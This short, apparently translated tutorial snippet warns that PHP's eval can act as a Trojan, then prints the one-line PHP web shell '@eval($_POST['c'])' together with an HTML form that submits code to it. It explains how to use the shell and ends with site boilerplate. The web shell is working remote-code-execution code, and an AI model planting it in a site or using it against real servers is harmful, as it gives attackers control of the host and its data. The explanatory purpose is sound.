eval can be used to execute any other php code, so be careful if the eval function is found in the code, it may It’s a Trojan
Just this sentence can kill people, anyone can post any file, so be careful
<?php @eval($_POST['c']);?>
The method of use is also very simple. Point the local submission file to the submission file, and the php code inside will be executed
<html> <body> <form action="a.php" method="post"> <input type="text" name="c" value="phpinfo();"> <input type="submit" value="submit"> </form> </body> </html>
The above is the entire content of this article, I hope you all like it.
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
